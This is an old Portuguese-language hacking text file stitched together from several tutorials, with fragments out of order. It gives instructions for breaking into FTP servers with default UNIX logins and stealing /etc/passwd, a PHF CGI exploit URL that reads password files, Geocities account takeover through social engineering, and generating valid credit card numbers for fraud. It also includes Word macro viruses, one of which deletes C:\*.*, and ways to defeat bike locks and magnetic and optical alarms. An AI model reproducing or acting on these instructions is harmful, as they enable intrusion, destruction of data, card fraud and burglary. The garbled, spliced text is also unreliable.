INVASÃO DE SERVIDOR DE FTP
Para Hackear um Servidor FTP, Primeiro vc deve saber o indereço do Host ou seu IP, para isto
use o IPSCAN ou outro programa qualquer de IP.
Lista de Alguns FTP's:
ftp.mandic.com.br
Existem varios Programas de FTP'S, no Windows vem um programa de FTP. Va ao Prompt e
digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome
do host ou seu IP, tipo (to) ftp.mandic.com.br.
Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, aí vai os passwords
do UNIX, se não der você deve tentar entrar INVISIVEL:
Login:
No login precione ENTER, no password precione ENTER novamente...
Ira aparecer o prompt ftp> ai é só digitar:
quote user ftp , precione ENTER e digite:
quote cwd ~root
Precione ENTER novamente e digite:
quote pass ftp
Pronto, vc esta Hackeando invisivel...
quote cwd ~sys e os outros da lista UNIX (acima)
ATENÇÃO!!!!
O arquivo de senhas podem estar em vários diretórios,
dependendo do tipo de UNIX, olhe a lista abaixo:
UNIX:
Bom... se vc não sabe os comandos, ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle
ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear.
Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e pode dá cadeia.
COMO HACKEAR A GEOCITIES
Entrei na página de poucas pessoas e pensei pq até hoje não ouvi falar
de alguém que tenha hackeado uma página dessa?? Se tem alguem realmente não ouvi falar!
-.- DIRETO AO ASSUNTO -.-
1- Anote o membername da página dando um source!
2- Anote o lugar em que essa pagina esta.
Logicamente vc só vai anotar o diretório e o block!
3- Agora vá até a página principal da Geocities e clique no link
CONTACT GEOCITIES do lado esquerdo (pode ter mudado), depois clique em SYSTEM PROBLEMS,
e depois em SYSTEM PROBLEMS REPORTING FORM.
4- Porra como e ridiculo né? Agora e so esperar em 3 ou 4 dias no máximo chega sua senha!
Obx: É mais facil de receber a senha se a home page que vc for hackear
for nova(no máximo 2 meses) se passar disso já fica muito díficil de
receber a resposta!
Fique tranquilo eles são muito atarefados pra verificarem se e vc
mesmo, quase 100% de chance de receber o email e não acontecer nada
com vc!
COMO DESCOBRIR SENHAS DE TRANCAS DE BIKES
Isso e muito simples e bastante eficaz:
1- Tem que ser uma tranca desse modelo (eu nunca testei com outro)
2- Pegue na parte onde tem os números e na que a outra parte
que coloca a corrente e force para os lados como se quisesse abrir, quando
estiver forçando, aperte todos os números com força, até
que todos se abaixem o máximo que possa conseguir... depois olhe
os que estiverem mais altos, pois eles que são a senha...
Muito Fácil !!!! Não?
Caso testem em outros modelos e tiverem hesito, me informem
ATAQUE VIA BROWER
O ataque via browser é um dos ataques mais faceis de executar, mas não da nem 50% de sucessos nos ataques.
Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica
Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados , existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.
Ex.: http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode
O QUE SÃO JOKEFILES ?
Esses arquivos, conhecido como brinquedinhos de lammers, sempre fazem uma piadinha e simula a reiniciação de seu pc ou a formatação de seu HD (oh! não!!).... o kra se caga todo!!
COMO PEGAR SENHAS PIRATAS
Existem vários meios de se obter senhas de acessos. Os mais comuns estão listados abaixo.
O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.
Farejamento de redes.
É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.
Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.
O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.
Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain
Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure
COMO FAZER CC's VÁLIDOS
Algoritmo para gerar números
de cartões de crédito válidos
Com certeza, toda a gente já ouviu falar nos
geradores de números de cartões de crédito!!!Porém muita
asneira é dita, acerca deste assunto.
1) Quando se efectua uma transacção na web, o
site "vitima", não verifica, imediatamente, se o
cartão tem crédito associado.(alem de que este tipo de
informação e confidencial e apenas, instituições bancárias,
teem acesso a este tipo de informação).
2)Um cartão pode ser válido, ou seja, o número
ter sido gerado pelo algoritmo correcto, e num entanto, não
estar atribuído, ou seja nenhuma entidade bancária, ou
financeira o tenha atribuído a um utilizador.
3)O facto de um cartão não estar atribuído, ao
contrário do que se diz, não inviabiliza uma compra...devido ao
ponto 1).
4)Se um gerador, por ventura, gerar um numero
atribuído... É PURA COINCIDÊNCIA!!! O sucesso, deste tipo, de
falcatrua, é relativo...eu, pessoalmente, nunca tentaria comprar
um Rolex, deste modo...porem,...quem resiste a dar uma
espreitadela, no bem guardado e bem pago site da Playboy! Claro,
que recomendo, ao que pensam em se aventurarem nestes domínios,
a darem uma saltada em www.anonymizer.com . Ao que interessa: Um
número válido de um Cartão de Crédito (CC), tem 16
algarismos, dos quais os quatro primeiros (chamado prefixo),
indicam o código do banco emissor, e o primeiro destes quatro
algarismos, indica a rede, onde este cartão é aceite: (um mesmo
banco , pode ter mais do que um prefixo, por exemplo, o Totta
Matic, é um serviço especial do Banco Totta e Açores, tem um
prefixo (4775), diferente dos cartões usuais!).
Mas, o que nos interessa, e saber como gerar
números validos de CC's...para isso e preciso saber muitos bem o
algoritmo que testa a sua validade. Para gerar um número, basta
apenas escolher o prefixo do banco (independentemente, se e Visa,
ou qualquer outra rede): 4938 .... .... ....
FAZENDO VÍRUS DE MACRO
Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquíssimo processador de texto.
Esta matéria tem como objetivo fazer desde pequenas até grandes sacanagens com usuários pentelhos.
Obs: Software/versão Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrão do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.
Níveis de sacanagem
Nível 1..... Apenas uma brincadeira
Nível 2..... Apenas uma brincadeira de mau gosto
Nível 3..... não é mais brincadeira.
Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatório) este macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.
Obs: existe outras formas/meios de criar uma macro, mas esta é mais simples.
Nivel 1
O nivel 1 serve para você se mostrar, falando que entende do Word melhor do que ninguém.
Cada vez que o usuário inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.
Sub MAIN
vMsgBox "Voce ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5
MsgBox "Usu rio Pirata Detectado", "FATAL ERROR", 16
MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64
End Sub
Nivel 2
É para deixar o usuário irritadíssimo.
Sub MAIN
ArquivoNovoPadrão
Inserir "ESQUISS"
ArquivoNovoPadrão
Inserir "ESGOTO"
ArquivoNovoPadrão
Inserir "você"
ArquivoNovoPadrão
Inserir "é"
ArquivoNovoPadrão
Inserir "GAY"
ArquivoNovoPadrão
Inserir "ESQUISS ESGOTO você é GAY "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "ESQUISS ESGOTO você é GAY "
End Sub
Nivel 3
Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe.
Sub MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub
Lembre-se de que estes macros, são gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao,então se voce for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.
Detalhes:
Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec' mas eu esqueci. (R$10 reais me ajudariam a lembrar)
A macro do word é uma ferramenta riquíssima, procure fuçar.
Voce pode fazer estas no seu próprio computador(só cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saie de perto, para ele não explodir em você.
Não me responsabilizo por qualquer ato.
VIOLANDO ALARMES
INTRODUÇÃO
Todo sistema de alarme necessita de uma central de processamento de sinais,
um sistema de aviso para fazer algum tipo de operacao qd a area eh violado ih
alguns sensores para fazer a integracao da area violada com a central de pro-
cessamento. Componentes básicos para um sistema convencional de alarmes:
SENSORES
Os sensores magneticos consistem num interruptor de laminas e um ima, monta-
dos em pecas separadas. Muito usados em portas e/ou janelas. Numa instalacao,
o interruptor(red-switch) eh q tem ligacao eletrica com o sistema de alarme
atraves de fios, e eh posicionado na parte fixa do objeto ih o ima eh
fixado na parte movel do objeto.
Quando o objeto está fechado o ima mantem as laminas do interruptor da parte
fixa escostadas uma na outra de modo que o alarme fique desarmado.
Se o imã for afastado do interruptor de laminas, qd a janela ou porta for
aberta, as laminas do interruptor abrem disparando o circuito.
Então vem aquela pergunta:
Aguenta q aki vai filhote.
No estado normal do objeto(fechado), as laminas do interruptor sao mantidas
encostadas pelo ima(fixado na parte movel do objeto) do sistema. Qualquer imã
(beim potente) externo mantera os contatos fechados, mesmo que o ima original
seja removido(abrindo o objeto). Assim o intruso tera q localizar a posicao
do sensor antes de tentar uma invazão ih assim podera neutralizar. Olhando
pelo lado de fora de uma janela ele podera localizar o sensor ih terah que
manter o seu ima nas proximidades. O alarme nao ira disparar mesmo q o ima da
janela seja afastado.
Um outro esquema parecido com esse eh o sistema de alarme para carro(aquele q
usa um chaveirinho para ativar/desativar). Neste caso o sensor eh acionado
pelo ima carregado num chaveiro de modo a armar e desarmar o alarme. Dae nao
eh mais necessario eu falar oq vc teim q fazer neh filhote.
O alarme de interrupcao é o tipo mais comum de alarmes q fax uso de sensores
opticos. Este alarme é formado por uma fonte de luz ih um sensor que devem
ser posicionados de tal forma que alguem que penetre no local protegido interrompa o feixe de luz.
Bom dependendo do tipo da fonte de luz o sistema podera
ser violado (ou melhor, podera ser enganado). Com a descoberta do sensor(emissor de luz) o
intruso podera inibir o sistema simplesmente focalizando uma lanterna.
Mas essa forma de enganar o alarme somente se aplica aos emissores de luz branca, pois o tipo
de luz (luz reta) que eh emitido pela lanterna eh igual ao do emissor de luz do sistema.
ftp.bestway.com.br
ftp.internetclub.com.br(HACKEADO)
ftp.netscape.com
ftp.angelfire.com
Password:
root
root
root
system
sys
sys
sys
system
daemon
daemon
uucp
uucp
tty
tty
test
test
unix
unix
unix
test
sysadmin
sys
sysadmin
system
sysadmin
admin
sysadmin
adm
who
who
learn
learn
uuhost
uuhost
guest
guest
host
host
nuucp
nuucp
rje
rje
Mas tem um porem..., se quando você entrar aparecer a mensagem: user restriction aplly, vc não
esta Hackeando, pois esta aplicada a proteção... para isto tente com outro USER tipo:
Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu
E-Mail, pois vai ser aplicado a proteção....
Ao entrar vc vai estar no diretório do login, tipo \home\root\
Daí você entra no diretório /etc (cd etc) e pegue o arquivo PASSWD (get passwd), ele contém as
senhas doas usuarios, estão todas criptografadas, mas existe prgramas com o Jack que conseguem
descriptografar através do metodo de comparação, o Jack pega uma Worlist (arquivo palavras
mais usadas como senha), criptografa ela com as instruções do passwd e compara, os resultados
são gravados em um arquivo.
Diretório:
AIX 3
/etc/security/passwd
/tcb/auth/files//
A/UX 3.Os
/tcb/files/auth/?
BSD4.3-Reno
/etc/master.passwd
ConvexOS 10
/etc/shadpw
Convex0S 11
/etc/shadow
DG/UX
/etc/tcb/aa/user
EP/IX
/etc/shadow
HP-UX
/.secure/etc/passwd
IRIX 5
/etc/shadow
Linux 1.1
/etc/shadow
OSF/1
/etc/passwd[.dir|.pag]
SCO Unix #.2.x
/tcb/auth/files/
SunOS 4.1+c2
/etc/security/passwd.adjunct
SunOS 5.0
/etc/shadow
System V 4.0
/etc/shadow
System V 4.2
/etc/security/database
Ultrix 4
/etc/auth[.dir|.pag]
UNICOS
/etc/udb
Não me responsabilizo por atos cometidos nos servidores... o problema é de quem Hackeia, e não
meu, tome muito cuidado, e NUNCA, mas NUNCA apague NADA....
Então olhei por dentro a página do FILE MANAGER na Geocities e tentei
descobrir alguma relação entre a minha senha e a porrada de números e
letras que aparecem ali; não encontrei relação nenhuma:) Mas aconselho
a continuarem tentando, coisa q eu ainda to fazendo!
E olhando a página de uma pessoa por dentro vi o counter da Geocities
ali dentro com o membername(lógico q todas tem),e pensei na maneira mais
ridícula de pegar a senha do cara.
Eu não esperava encontrar profissionais tão imbecis lá, mas eles existem sim.
ex: http://www.geocities.com/Augusta/2000/
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Lá vc vai colocar as informações necessárias, o diretório(acima citado)
o block, o seu email(aconselho a fazer o forward) e no espaço abaixo
vc vai colocar o problema, diga que ainda não recebeu sua senha(em inglês "I haven't recive my password, could you send me.)
_______
| _ |
|_| | |
___|_|
| |
| 1 2 |
| 3 4 |
| 5 6 |
| 7 8 |
| 9 0 |
|_____|
| |
",,,,,
Vou tentar explicar como você usa esse metódo:
aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
usar o anonymizer, bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.
pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada
usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário
é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite
telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro
sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que
suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser
(mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo).
Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha
esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas.
Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
3 -> American Express
4 -> Visa (a mais usada em Portugal)
5 -> MasterCard
6 -> Discover (esta rede não e usada em Portugal)
Como se verifica então que um número é
válido?: Por exemplo o cartão... 4938 0723 5791 0411 (rede:
Visa ,Banco Pinto & Sotto Mayor). Se pegarmos nos algarismos
que ocupam as posições impares no número do CC: 4 3 0 2 5 9 0
1 e apenas nestes, que ocupam posições impares. Agora a esses
algarismos multiplica-se 2, se o resultado for maior que 9,
dever-se-a subtrair nove a multiplicação...ficara então algo
como: 8 6 0 4 1 9 0 2 ..isto então passará, juntando outra vez
os algarismos que ocupam as posições pares, para:
8968 0743 1791 0421 agora se a soma de
todos os algarismos deste novo número for um múltiplo de 10 e
menor do que 150, o número inicial é válido... ex:
8+9+6+8+0+7+4+3+1+7+9+1+0+4+2+1=70, que por sua vez e um
múltiplo de 10 e é menor do que 150!!
Sabemos então o
prefixo, e queremos criar o resto...pois bem, é fácil: Geram-se
aleatoriamente, mais 11 algarismos (E NÃO 12!!), e ficamos, por
exemplo com o seguinte: 4938 1432 6745 362. Ou seja, o último
algarismo permanece, por agora desconhecido... Tal como na
função para testar, o processo e semelhante: nos algarismos que
ocupam posições impares, multiplicam-se por 2, e os que com
esta multiplicação ficarem maiores do que 9, subtrai-se 9 ao
resultado, o resultado e este: 8 6 2 6 3 8 6 4. que juntando com
os restantes algarismos: 8968 2462 3785 664. A soma total dos
algarismos é: 8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84 Ora, para este
numero ser valido, basta que o ultimo algarismo, que ainda não
está atribuído seja 6, pois:
8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84+6=90 !!!! 90 e menor do que 150
e é múltiplo de 10. Ora cá temos um número gerado,
válido!!!!!!!!!!!!!!!!! Para extrapolar números, a partir de
porções de outros números, o processo e exactamente o mesmo.
Por exemplo, queremos extrapolar números a partir da seguinte
porção de um outro número: 4938 452. .... ....
Geram-se aleatoriamente os restantes números, exceto o último, e
pratica-se a já conhecida regra!!!!!!!! Como podem ver, fazer um
gerador de números de CC's e simples, apenas requer prática de
algoritmia. Já agora ficam aqui também alguns prefixos de
bancos portugueses, não inclui bancos estrangeiros, pois
qualquer gerador, possui uma lista destes!!!
4775 - Banco Totta & Acores
(TottaMatic) 4943 - Banco Mello
4552 - Banco Comercio e Industria
5901 - Banco Atlantico
4154 - Nova Rede
4547 - Banco Fonsecas e Burnay
5906 - Banco Borges Irmao
5016 - Banco Nacional Ultramarino
4407 - Banco Espirito Santo
4938 - Banco Pinto & Sotto Mayor
4552 - Banco Internacional de Credito
4644 - Caixa Geral de Depositos
No corpo da macro cole este texto abaixo:
CIRCUITO CENTRAL
FONTE / BATERIA SISTEMA
DE DESARME DE CONTROLE
CARREGADOR, ETC DE AVISO
Como Violar ?